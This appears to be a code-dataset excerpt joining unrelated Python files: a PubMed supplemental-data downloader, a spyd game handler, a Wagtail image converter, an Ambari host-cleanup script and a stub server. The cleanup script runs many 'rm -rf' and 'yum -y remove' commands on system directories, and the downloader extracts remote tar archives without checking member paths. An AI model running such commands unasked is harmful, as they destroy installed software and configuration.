url = GEONAMES_URL.replace("LPH", clean_loc).replace("CPH", str(count)).replace("MPH", full)
resp = http_get_query(url)
if resp:
jsondata = resp.json()
if jsondata and "retrieved" in jsondata and int(jsondata["retrieved"]) > 0:
loc = jsondata["records"]
break
elif debug:
logging.debug("Search returned no results: '%s' -> '%s'", location, clean_loc)
else:
logging.error("Could not lookup location: %s, Check ZooPhy GeoNames API.", clean_loc)
elif debug:
logging.error("Invalid String: '%s' -> '%s'", location, clean_loc)
return loc
def normalize_entities(spans):
'''
Normalize entities using just the information available in the text extracted.
Strategies are currently limited to heuristics for scalability and efficiency.
1) population i.e. Paris, France over Paris, TX because of its population
2) cooccurence and proximity i.e. 'Assam and Nagaland states in India'
3) immediate hierarchy i.e. Springfield, IL or Springfield, MA
4) ALL THE COOL STUFF I HAVE/HAVEN'T THOUGHT ABOUT BUT UNIMPLEMENTED
e.g. DEPENDENCY PARSING or RELATIONSHIP EXTRACTION FOR ESTABLISHING CAUSALITY
TODO: Co-occurence is not implemented yet
Parameter cache_dict is used to minimize responses
'''
doc_ent_objs = []
if spans:
for span in spans:
if span.text.strip() and span.encoding == LOC_ANN_TAG:
records = lookup_location_pop(span.text, MODE_STRICT, 10)
poss_locs = extract_probability(records)
# Assume first location is the best location
best_loc = poss_locs[0] if len(poss_locs) > 0 else None
norm_ent_obj = NamedEntityObj(span, best_loc, poss_locs)
doc_ent_objs.append(norm_ent_obj)
# Remove entities that couldn't be resolved
doc_ent_objs = [x for x in doc_ent_objs if x.best_loc is not None]
return doc_ent_objs
def download_pubmed_record(pmid):
'''Extract pubmed text from the response'''
raw_json = ""
# try to get the pmcoa text from pmid
url = PMCOA_URL.replace("PMCOAPH", pmid)
resp = http_get_query(url)
# if there are no OA texts then pickup pubmed abstract
try:
if resp.text:
if resp.text.find("[Error]", 0, 10) > -1:
logging.debug("Found in PM Only: %s", pmid)
url = PUBMED_URL.replace("PMPH", pmid)
resp = http_get_query(url)
if resp:
if resp.text.find("[Error]", 0, 10) > -1:
logging.error("PMID %s not found", pmid)
else:
raw_json = resp.text
else:
logging.debug("Found in PMC OA: %s", pmid)
raw_json = resp.text
if EXTRACT_SUPPLEMENTAL:
raw_json = download_supplemental(raw_json)
except Exception as error:
logging.error("Error retrieving json %s from PubMed/PMC OA server: %s", pmid, error)
return raw_json
def download_supplemental(raw_json):
'''Download supplemental files and add content to json'''
# first retrieve the PMC id as PMID is not supported
try:
doc_bioc = json.loads(raw_json)
pmcid = "PMC"+doc_bioc["documents"][0]["id"] if doc_bioc["source"] == "PMC" else None
passages = [passage for doc in doc_bioc["documents"] for passage in doc["passages"]]
# for doc in doc_bioc["documents"]:
for passage in passages:
section_type = passage["infons"]["section_type"]
if section_type == "SUPPL":
logging.debug("Attempting extraction of supplemental information from %s", pmcid)
url = PMC_OA_FTP_URL.replace("IDPH", pmcid)
resp = http_get_query(url)
xml = resp.text
query_re = re.search(FTP_REGEX, xml)
supp_text = passage["text"]
if query_re:
ftp_url = query_re.group(1)
pmcdir = ftp_get_query(ftp_url)
if pmcdir:
supp_text = extract_text_from_files(pmcdir)
passage["text"] = supp_text
break
# extract based on file format
# doc_bioc = format_supplemental_data(doc_bioc, supp_files)
raw_json = json.dumps(doc_bioc)
except Exception as error:
logging.error("Cant extract json from %s: %s", pmcid, error)
return raw_json
return raw_json
def extract_text_from_files(pmcdir):
supp_files = [x for x in listdir(pmcdir) if x.split(".")[-1] in SUPPLEMENTAL_DATA_FILETYPES]
logging.debug("Files for extraction in %s : %s", pmcdir, ",".join(supp_files))
# For now just extract all text the same way using textract
supp_file_contents = {x:str(textract.process(join(pmcdir, x))).replace("\\n", "\n") for x in supp_files}
supp_contents = ""
for suppfile, content in supp_file_contents.items():
supp_contents += "\n\n*** " + str(suppfile) + " ***\n" + str(content)
logging.debug("Added '%s' chars from '%s'", len(content), suppfile)
return supp_contents
def format_supplemental_data(doc_bioc, supp_files):
'''Format and add data to original json as per filetype
This is a TODO item and files should be formatted based on filetype
Observations in filetype
1) Tables in .doc and .docx format have pipe character i.e. | to separate columns
2) Excel format .xls and .xlsx may benefit from using pandas
3) .pdf is challenging
'''
return doc_bioc
def http_get_query(url, debug=False, timeout=5, retries=1):
'''Generic HTTP get query with error handling'''
resp = None
start = time.time()
while not resp and retries > 0:
try:
resp = requests.get(url, timeout=timeout)
except Exception as e:
logging.error("Error in GET: %s Error: %s", url, e)
retries -= 1
if debug:
logging.debug("URL: %s Time: %s", url, time.time()-start)
return resp
def ftp_get_query(url, debug=False, retries=1, unzip=True):
'''Generic FTP get query with error handling'''
extdir = None
start = time.time()
while not extdir and retries > 0:
try:
filename = url.split("/")[-1]
download_path = SUPPLEMENTAL_DATA_DIR+filename
with closing(request.urlopen(url)) as r:
with open(download_path, 'wb') as f:
shutil.copyfileobj(r, f)
if unzip:
with tarfile.open(download_path) as tarf:
tarf.extractall(SUPPLEMENTAL_DATA_DIR)
extdir = SUPPLEMENTAL_DATA_DIR+filename[:-7]
except Exception as e:
logging.error("Error in FTP: %s Error: %s", url, e)
retries -= 1
if debug:
logging.debug("URL: %s Time: %s", url, time.time()-start)
return extdir
| 43.087948 | 121 | 0.623828 |
ea7c9d654b862ff1c6628c6502dd2374c528a0ec | 555 | py | Python | src/spyd/game/client/message_handlers/editm_handler.py | DanSeraf/spyd | af893b7f9c67785613b25754eb2cf150523a9fe4 | [
"Zlib"
] | 4 | 2015-05-05T16:44:42.000Z | 2020-10-27T09:45:23.000Z | src/spyd/game/client/message_handlers/editm_handler.py | DanSeraf/spyd | af893b7f9c67785613b25754eb2cf150523a9fe4 | [
"Zlib"
] | null | null | null | src/spyd/game/client/message_handlers/editm_handler.py | DanSeraf/spyd | af893b7f9c67785613b25754eb2cf150523a9fe4 | [
"Zlib"
] | 2 | 2016-12-13T22:21:08.000Z | 2020-03-14T16:44:20.000Z | from spyd.registry_manager import register
from spyd.game.edit.selection import Selection
@register('client_message_handler')
class EditmHandler(object):
message_type = 'N_EDITM'
@staticmethod
def handle(client, room, message):
del message['aiclientnum']
player = client.get_player()
selection = Selection.from_message(message)
material = message['material']
material_filter = message['material_filter']
room.handle_player_event('edit_material', player, selection, material, material_filter)
| 32.647059 | 95 | 0.724324 |
a7d99d19c8cd559ebf96814bdceb44ac3debe1ae | 1,902 | py | Python | wagtail/images/rich_text/contentstate.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | 1 | 2022-02-09T05:25:30.000Z | 2022-02-09T05:25:30.000Z | wagtail/images/rich_text/contentstate.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | wagtail/images/rich_text/contentstate.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | """
Draftail / contentstate conversion
"""
from draftjs_exporter.dom import DOM
from wagtail.admin.rich_text.converters.contentstate_models import Entity
from wagtail.admin.rich_text.converters.html_to_contentstate import (
AtomicBlockEntityElementHandler,
)
from wagtail.images import get_image_model
from wagtail.images.formats import get_image_format
from wagtail.images.shortcuts import get_rendition_or_not_found
def image_entity(props):
"""
Helper to construct elements of the form
<embed alt="Right-aligned image" embedtype="image" format="right" id="1"/>
when converting from contentstate data
"""
return DOM.create_element(
"embed",
{
"embedtype": "image",
"format": props.get("format"),
"id": props.get("id"),
"alt": props.get("alt"),
},
)
class ImageElementHandler(AtomicBlockEntityElementHandler):
"""
Rule for building an image entity when converting from database representation
to contentstate
"""
def create_entity(self, name, attrs, state, contentstate):
Image = get_image_model()
try:
image = Image.objects.get(id=attrs["id"])
image_format = get_image_format(attrs["format"])
rendition = get_rendition_or_not_found(image, image_format.filter_spec)
src = rendition.url
except Image.DoesNotExist:
src = ""
return Entity(
"IMAGE",
"IMMUTABLE",
{
"id": attrs["id"],
"src": src,
"alt": attrs.get("alt"),
"format": attrs["format"],
},
)
ContentstateImageConversionRule = {
"from_database_format": {
'embed[embedtype="image"]': ImageElementHandler(),
},
"to_database_format": {"entity_decorators": {"IMAGE": image_entity}},
}
| 28.818182 | 83 | 0.621451 |
e6e50f4cd30240cdbc6b6faa0c04d122c24eb72f | 1,110 | py | Python | ambari-server/src/main/resources/custom_actions/scripts/clean_host.py | Arenadata/ambari | 4628267441121779113d98936dcdf5d9be60553c | [
"Apache-2.0"
] | 5 | 2017-07-20T11:15:10.000Z | 2020-04-16T15:42:55.000Z | ambari-server/src/main/resources/custom_actions/scripts/clean_host.py | Arenadata/ambari | 4628267441121779113d98936dcdf5d9be60553c | [
"Apache-2.0"
] | 3 | 2017-08-04T14:02:17.000Z | 2018-06-06T14:47:25.000Z | ambari-server/src/main/resources/custom_actions/scripts/clean_host.py | Arenadata/ambari | 4628267441121779113d98936dcdf5d9be60553c | [
"Apache-2.0"
] | 12 | 2017-05-17T09:48:01.000Z | 2021-08-05T19:01:25.000Z | import os
os.system('yum -y remove hadoop-*')
os.system('yum -y remove hive*')
os.system('yum -y remove pig-udf-datafu')
os.system('yum -y remove tez')
os.system('yum -y remove ranger-*')
os.system('yum -y remove hbase')
os.system('yum -y remove phoenix')
os.system('yum -y remove mahout')
os.system('yum -y remove zookeeper')
os.system('yum -y remove kafka')
os.system('yum -y remove kafka-server')
os.system('yum -y remove spark-*')
os.system('yum -y remove solr')
os.system('yum -y remove oozie*')
os.system('rm -rf /usr/lib/hadoop')
os.system('rm -rf /usr/lib/hadoop-*')
os.system('rm -rf /usr/lib/hive*')
os.system('rm -rf /usr/lib/hbase')
os.system('rm -rf /usr/lib/solr')
os.system('rm -rf /usr/lib/oozie')
os.system('rm -rf /usr/lib/spark')
os.system('rm -rf /usr/lib/phoenix')
os.system('rm -rf /usr/lib/zookeeper')
os.system('rm -rf /etc/hadoop')
os.system('rm -rf /etc/hive*')
os.system('rm -rf /etc/hbase')
os.system('rm -rf /etc/phoenix')
os.system('rm -rf /etc/kafka')
os.system('rm -rf /etc/oozie')
os.system('rm -rf /etc/solr')
os.system('rm -rf /etc/spark')
os.system('rm -rf /etc/zookeeper')
| 32.647059 | 41 | 0.672072 |
7e566cdb694a7b57a9469cd78840eb8308778c85 | 270 | py | Python | plugins/echo.py | Nicholasjl/python-OPQBot | 616318beac9f4187f6e20052222eeb9a42a65fc7 | [
"MIT"
] | 8 | 2020-08-09T05:21:22.000Z | 2022-01-11T01:54:45.000Z | plugins/echo.py | Nicholasjl/python-OPQBot | 616318beac9f4187f6e20052222eeb9a42a65fc7 | [
"MIT"
] | null | null | null | plugins/echo.py | Nicholasjl/python-OPQBot | 616318beac9f4187f6e20052222eeb9a42a65fc7 | [
"MIT"
] | null | null | null | from Control import on_command
from Message import send, sendGroup
@on_command("ECHO")
async def echo(message):
if(message.isGroup):
await sendGroup(message.FromQQG, message.Content)
else :
await send(message.FromQQ, message.Content) | 30 | 58 | 0.696296 |
36b5b69bd7e34275aa54ae7c92cf1c28b2d3acf8 | 160 | py | Python | classes/die.py | Inctus/DND-Dice | 2ed97544a9c1bfded61ea0ffcdc01f593cc5a8e1 | [
"MIT"
] | 1 | 2021-02-08T17:20:47.000Z | 2021-02-08T17:20:47.000Z | classes/die.py | Inctus/DND-Dice | 2ed97544a9c1bfded61ea0ffcdc01f593cc5a8e1 | [
"MIT"
] | null | null | null | classes/die.py | Inctus/DND-Dice | 2ed97544a9c1bfded61ea0ffcdc01f593cc5a8e1 | [
"MIT"
] | null | null | null | # MODULES
from random import randint
# CLASS
class Die():
def __init__(self, sides=6):
self.sides = sides
def roll(self):
return randint(1, self.sides) | 16 | 31 | 0.7 |
04208d83ed2294a0048dd65bd5b58e220ef8e891 | 801 | py | Python | lib/common.py | Seyaio/Seyabot | 0a8e63046ed208d301e9cb77d0b67b46ca6d9514 | [
"MIT"
] | null | null | null | lib/common.py | Seyaio/Seyabot | 0a8e63046ed208d301e9cb77d0b67b46ca6d9514 | [
"MIT"
] | null | null | null | lib/common.py | Seyaio/Seyabot | 0a8e63046ed208d301e9cb77d0b67b46ca6d9514 | [
"MIT"
] | null | null | null | from apscheduler.schedulers.asyncio import AsyncIOScheduler
import httpx
# 供实现单例模式
def SingleInstance(cls):
_instance = {}
def wrapper(*args, **kwargs):
if cls not in _instance:
_instance[cls] = cls(*args, **kwargs)
return _instance[cls]
return wrapper
# 测试用的计时器
def TestTime(func):
async def wrapper(*args, **kwargs):
import time
old_time = time.time()
res = await func(*args, **kwargs)
print(time.time() - old_time)
return res
return wrapper
# 供定时任务使用
runing_job_dict = {}
scheduler = AsyncIOScheduler(timezone='Asia/Shanghai')
# 供功能访问HTTP使用
httpx_client = httpx.AsyncClient(timeout=httpx.Timeout(timeout=3.0))
# 供保存会话
# {session_id: {"funcname": "...", "session": session_obj}}
session_storage = {}
| 20.538462 | 68 | 0.654182 |
429c807ee1eeed7209c2241f00666eff4c8f0d41 | 645 | py | Python | app.py | Theropod/send2wechat_template | ccd3be070c7c040de4998661e69f458321bb37a7 | [
"MIT"
] | null | null | null | app.py | Theropod/send2wechat_template | ccd3be070c7c040de4998661e69f458321bb37a7 | [
"MIT"
] | null | null | null | app.py | Theropod/send2wechat_template | ccd3be070c7c040de4998661e69f458321bb37a7 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
from wechat_work_helper import send_textmessage
from flask import Flask,request,jsonify,abort
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/send2wechat/api/v1/mstodo', methods=['POST'])
def sendmstodo():
if not request.json or not 'subject' or not 'time' in request.json:
abort(400)
postcontent='N/A'
if ('content' in request.json):
content=request.json['content']
textmessage = request.json['time'] + '\n' + request.json['subject'] + '\n' + postcontent
task = send_textmessage(textmessage)
return jsonify({'task': task}), 201
| 30.714286 | 92 | 0.668217 |
d2c328de7e703d0bd1be2f5ed3d1920f77d36099 | 12,149 | py | Python | tests/test_plots.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | 7 | 2020-07-14T20:30:23.000Z | 2022-02-14T05:58:22.000Z | tests/test_plots.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | 89 | 2020-11-25T18:38:21.000Z | 2022-02-25T12:37:45.000Z | tests/test_plots.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from .testutil import LsTestCase, run, get_plot_data
class TestInitialValues(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_initial_v(self):
# Test vplot
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b
start_v: s1->b:7, default:1.5
@phase foo stop:s1=3
L1 s1 | L1
@run foo
@vplot s1->b
@vplot s2->b
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 2)
plot_data = get_plot_data()
s1b = plot_data['v(s1->b)']
s2b = plot_data['v(s2->b)']
self.assertEqual(s1b['x'], [0, 1, 2])
self.assertEqual(s2b['x'], [0, 1, 2])
self.assertEqual(s1b['y'][0], 7)
self.assertEqual(s2b['y'][0], 1.5)
# Test pplot
self.tearDown()
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s2:1, default:0
start_v: s1->b1:0.5, default:0
@phase foo stop:s1=10
nju_trial s1 | b1:S2 | @omit_learn, nju_trial
S2 s2 | @omit_learn, nju_trial
@run foo
@figure
@subplot 111 - {'ylim':[-0.1, 1.1]}
@vplot s1->b1
@pplot s1->b1
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 4)
plot_data = get_plot_data()
self.assertEqual(plot_data['v(s1->b1)']['y'][0], 0.5)
self.assertGreater(plot_data['p(s1->b1)']['y'][0], 0.622)
self.assertLess(plot_data['p(s1->b1)']['y'][0], 0.623)
# Test pplot with default start_v
self.tearDown()
text = '''
#n_subjects: 1
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s2:1, default:0
start_v: default:0
@phase foo stop:s1=100
nju_trial s1 | b1:S2 | @omit_learn, nju_trial
S2 s2 | @omit_learn, nju_trial
@run foo
@figure
xscale:s1
@vplot s1->b1
@pplot s1->b1
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 3)
plot_data = get_plot_data()
self.assertEqual(plot_data['v(s1->b1)']['y'][0], 0)
self.assertEqual(plot_data['p(s1->b1)']['y'][0], 0.5)
self.assertEqual(len(plot_data['p(s1->b1)']['x']), 100)
self.assertEqual(len(plot_data['p(s1->b1)']['y']), 100)
self.assertLess(plot_data['v(s1->b1)']['y'][99], 1.001)
self.assertGreater(plot_data['v(s1->b1)']['y'][99], 0.999)
self.assertLess(plot_data['p(s1->b1)']['y'][99], 0.8)
self.assertGreater(plot_data['p(s1->b1)']['y'][99], 0.6)
# Same as above but without @omit_learn
self.tearDown()
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase foo stop:s1=100
nju_trial s1 | b1:S2 | nju_trial
S2 s2 | nju_trial
@run foo
@figure
xscale = s1
@vplot s1->b1
@pplot s1->b1
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 3)
plot_data = get_plot_data()
self.assertEqual(plot_data['v(s1->b1)']['y'][0], 0)
self.assertEqual(plot_data['p(s1->b1)']['y'][0], 0.5)
self.assertEqual(len(plot_data['p(s1->b1)']['x']), 100)
self.assertEqual(len(plot_data['p(s1->b1)']['y']), 100)
self.assertGreater(plot_data['v(s1->b1)']['y'][99], 80)
self.assertLess(plot_data['p(s1->b1)']['y'][99], 1.01)
self.assertGreater(plot_data['p(s1->b1)']['y'][99], 0.99)
def test_initial_w(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b
start_w: s1:1, s2:2
@phase foo stop:s1=3
L1 s1 | L1
@run foo
@wplot s1
@wplot s2
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 2)
plot_data = get_plot_data()
s1 = plot_data['w(s1)']
s2 = plot_data['w(s2)']
self.assertEqual(s1['x'], [0, 1, 2])
self.assertEqual(s2['x'], [0, 1, 2])
self.assertEqual(s1['y'][0], 1)
self.assertEqual(s2['y'][0], 2)
class TestPlotProperties(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_phases(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1 # Only one behavior to make plots deterministic
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase phase1s stop:s1=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase1nt stop:new_trial=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2s stop:s1=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2nt stop:new_trial=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@run phase1s, phase2s runlabel:s
@run phase1nt, phase2nt runlabel:nt
@figure s
runlabel: s
phases: phase1s
@vplot s1->b1 {'label':'only_phase1s'}
phases: phase2s
@vplot s1->b1 {'label':'only_phase2s'}
phases: phase1s, phase2s
@vplot s1->b1 {'label':'both_phase1s_and_phase2s'}
@figure nt
runlabel: nt
phases: phase1nt
@vplot s1->b1 {'label':'only_phase1nt'}
phases: phase2nt
@vplot s1->b1 {'label':'only_phase2nt'}
phases: phase1nt, phase2nt
@vplot s1->b1 {'label':'both_phase1nt_and_phase2nt'}
'''
script_obj, script_output = run(text)
plot_data_s = get_plot_data(figure_number=1)
plot_data_nt = get_plot_data(figure_number=2)
self.assertEqual(plot_data_s['only_phase1s'],
plot_data_nt['only_phase1nt'])
self.assertEqual(plot_data_s['only_phase2s'],
plot_data_nt['only_phase2nt'])
self.assertEqual(plot_data_s['both_phase1s_and_phase2s'],
plot_data_nt['both_phase1nt_and_phase2nt'])
def test_phases_all(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
bind_trials: off
@phase phase1 stop:new_trial=5
new_trial s1 | new_trial
@run phase1
@vplot s1->b1 {'label':'phases not set'}
phases: all
@vplot s1->b1 {'label':'phases: all'}
phases: phase1
@vplot s1->b1 {'label':'phases: phase1'}
'''
script_obj, script_output = run(text)
plot_data = get_plot_data()
self.assertEqual(plot_data['phases not set'], plot_data['phases: all'])
self.assertEqual(plot_data['phases: all'], plot_data['phases: phase1'])
def test_phases_and_xscale(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1 # Only one behavior to make plots deterministic
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase phase1s stop:s1=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase1nt stop:new_trial=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2s stop:s1=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2nt stop:new_trial=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@run phase1s, phase2s runlabel:s
@run phase1nt, phase2nt runlabel:nt
@figure s
xscale: s1
runlabel: s
phases: phase1s
@vplot s1->b1 {'label':'only_phase1s'}
phases: phase2s
@vplot s1->b1 {'label':'only_phase2s'}
phases: phase1s, phase2s
@vplot s1->b1 {'label':'both_phase1s_and_phase2s'}
@figure nt
xscale: new_trial
runlabel: nt
phases: phase1nt
@vplot s1->b1 {'label':'only_phase1nt'}
phases: phase2nt
@vplot s1->b1 {'label':'only_phase2nt'}
phases: phase1nt, phase2nt
@vplot s1->b1 {'label':'both_phase1nt_and_phase2nt'}
'''
script_obj, script_output = run(text)
plot_data_s = get_plot_data(figure_number=1)
plot_data_nt = get_plot_data(figure_number=2)
self.assertEqual(plot_data_s['only_phase1s'],
plot_data_nt['only_phase1nt'])
self.assertEqual(plot_data_s['only_phase2s'],
plot_data_nt['only_phase2nt'])
self.assertEqual(plot_data_s['both_phase1s_and_phase2s'],
plot_data_nt['both_phase1nt_and_phase2nt'])
def test_phase_order_not_run_order1(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s1:1, default:0
@phase phase1 stop:S1=5
S1 s1 | S1
@run phase1
@wplot s1
'''
run(text)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [0, 1, 2, 3, 4])
def test_phase_order_not_run_order2(self):
"""
Test that the first value in plot (x=0) is
- inital value if the first phase in 'phases' is the first run phase,
- last value of previous phase if the first phase in 'phases' is not the first run phase.
"""
text = '''
mechanism: ga
stimulus_elements: s1, s2, s3
behaviors: b1, b2
u: s1:1
@phase phase1 stop:S1=5
S1 s1 | S1
@phase phase2 stop:S2=10
S1 s1 | new_trial
@run phase1, phase2, phase3
phases: phase2, phase1
@nplot s1
'''
# assert(False) # Test all plot types and that y(0) is last value in previous phase
# (or start value if first phase)
def test_run_phases(self):
"""
Test that running two phases and plotting only the first is the same as running
and plotting only the first.
"""
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1 # Only one behavior to make plots deterministic
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase phase1 stop:s1=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2 stop:s1=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@run phase1, phase2 runlabel:both
@run phase1 runlabel:phase1
runlabel: both
phases: phase1
@vplot s1->b1 {'label':'run_both_plot_first'}
runlabel: phase1
phases: all
@vplot s1->b1 {'label':'run_only_first'}
'''
script_obj, script_output = run(text)
plot_data = get_plot_data()
self.assertEqual(plot_data['run_both_plot_first'],
plot_data['run_only_first'])
class TestExceptions(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_no_run(self):
text = """
mechanism: ga
stimulus_elements: s1, s2
behaviors: b
start_v: s1->b:7, default:1.5
@phase foo stop:s1=2
L1 s1 | L1
@vplot s1->b
"""
msg = "Error on line 8: There is no @RUN."
with self.assertRaisesMsg(msg):
run(text)
| 28.451991 | 97 | 0.55412 |
623b8e97872ef244be0452b3d16a235a723f1cb9 | 1,830 | py | Python | nemo_text_processing/text_normalization/en/taggers/punctuation.py | 23jura23/NeMo | 6815146775432852feee1bc28ed1a7a2fc94010d | [
"Apache-2.0"
] | 2 | 2019-11-14T17:25:12.000Z | 2021-02-22T19:54:48.000Z | nemo_text_processing/text_normalization/en/taggers/punctuation.py | 23jura23/NeMo | 6815146775432852feee1bc28ed1a7a2fc94010d | [
"Apache-2.0"
] | null | null | null | nemo_text_processing/text_normalization/en/taggers/punctuation.py | 23jura23/NeMo | 6815146775432852feee1bc28ed1a7a2fc94010d | [
"Apache-2.0"
] | 2 | 2020-06-13T15:04:41.000Z | 2020-08-19T20:13:01.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
# Copyright 2015 and onwards Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from unicodedata import category
from nemo_text_processing.text_normalization.en.graph_utils import GraphFst
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = False
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
class PunctuationFst(GraphFst):
"""
Finite state transducer for classifying punctuation
e.g. a, -> tokens { name: "a" } tokens { name: "," }
Args:
deterministic: if True will provide a single transduction option,
for False multiple transduction are generated (used for audio-based normalization)
"""
def __init__(self, deterministic: bool = True):
super().__init__(name="punctuation", kind="classify", deterministic=deterministic)
s = "!#$%&\'()*+,-./:;<=>?@^_`{|}~\""
punct_unicode = [chr(i) for i in range(sys.maxunicode) if category(chr(i)).startswith("P")]
punct_unicode.remove('[')
punct_unicode.remove(']')
punct = pynini.union(*s) | pynini.union(*punct_unicode)
self.graph = punct
self.fst = (pynutil.insert("name: \"") + self.graph + pynutil.insert("\"")).optimize()
| 34.528302 | 99 | 0.691257 |
5e0b5df51b89d01cfc68c8ef29bbf769d157dd0d | 2,245 | py | Python | Endpoint_TP/code_base/stats.py | ManuelMeinen/DC-MONDRIAN | bbaf6dcc67bc38540c66e997ad201739792224f6 | [
"Apache-2.0"
] | null | null | null | Endpoint_TP/code_base/stats.py | ManuelMeinen/DC-MONDRIAN | bbaf6dcc67bc38540c66e997ad201739792224f6 | [
"Apache-2.0"
] | null | null | null | Endpoint_TP/code_base/stats.py | ManuelMeinen/DC-MONDRIAN | bbaf6dcc67bc38540c66e997ad201739792224f6 | [
"Apache-2.0"
] | null | null | null | import threading
import time
import sys
sys.path.append("..") #TODO figure out wtf is wrong with python imports
from code_base.const import Const
class Stats:
'''
This class is used to keep track of the number of packet-in messages per delta_t
'''
def __init__(self, hard_timeout, idle_timeout, delta_t=60):
self.hard_timeout = hard_timeout
self.idle_timeout = idle_timeout
self.data = {}
self.data_lock = threading.Lock()
self.time = time.time()
self.count = 0
self.delta_t = delta_t
self.From = 0
self.To = delta_t
self.res_path = Const.BASE_PATH+"/Endpoint_TP/benchmarking_res/packet-in_report_"+str(Const.endpointTPPort)+"_HARD_TIMEOUT_"+str(self.hard_timeout)+"_IDLE_TIMEOUT_"+str(self.idle_timeout)+".bench"
with open(self.res_path, 'w+') as f:
f.write("")
self.write("second,No_of_Packets\n")
#self.write("-------------------\n")
self.daemon = threading.Thread(target=self.write_result)
self.daemon.daemon = True
self.daemon.start()
def tick(self):
'''
Is invoked whenever the event we want to observe occured
'''
while time.time()-self.time > self.delta_t:
#self.write(str(self.From)+"s "+str(self.To)+"s "+str(self.count)+"\n")
self.data_lock.acquire()
self.data[str(self.From)] = self.count
self.data_lock.release()
self.count = 0
self.From = self.To
self.To = self.To+self.delta_t
self.time = self.time+self.delta_t
self.count += 1
def write(self, msg):
'''
Write the results in stream s to file name
'''
with open(self.res_path, 'a') as f:
f.write(str(msg))
def write_result(self):
while True:
with open(self.res_path, 'a') as f:
self.data_lock.acquire()
local_data = self.data
self.data = {}
self.data_lock.release()
for key, value in local_data.items():
f.write(str(key)+','+str(value)+'\n')
time.sleep(11*60)
| 35.634921 | 204 | 0.560802 |
c81b0463fd48b72ebae24c1ee773be356b8c019c | 1,203 | py | Python | tsukiserver.py | faith1337z/Bot_for_dev | 6d8c6782bdaa05fb1f6362fc79749205974319a4 | [
"MIT"
] | null | null | null | tsukiserver.py | faith1337z/Bot_for_dev | 6d8c6782bdaa05fb1f6362fc79749205974319a4 | [
"MIT"
] | null | null | null | tsukiserver.py | faith1337z/Bot_for_dev | 6d8c6782bdaa05fb1f6362fc79749205974319a4 | [
"MIT"
] | null | null | null | import sys
from Naked.toolshed.shell import execute_js
import pandas as pd
import numpy as np
import s_command as sc
import p_command as pc
class server():
def __init__(self, coin, par, ex):
self.coin = coin
self.par = par
self.ex = ex
def run(self):
scom = sc.s_command(self.coin)
pcom = pc.p_command(self.coin)
# Wait for the command input from bot.js
command = raw_input()
if command[0] == 's':
# Get the latest DataFrame from the CSV
self.par = (60 if (int(self.par) > 61 or int(self.par) == -1) else self.par)
s = scom.writeToFile(self.par,self.ex)
# Writing to stdout gives the answer to bot.js
print s
elif command[0] == 'p':
# I need to rename writeToFile to something like 'on_demand'
s = pcom.spikeCheck()
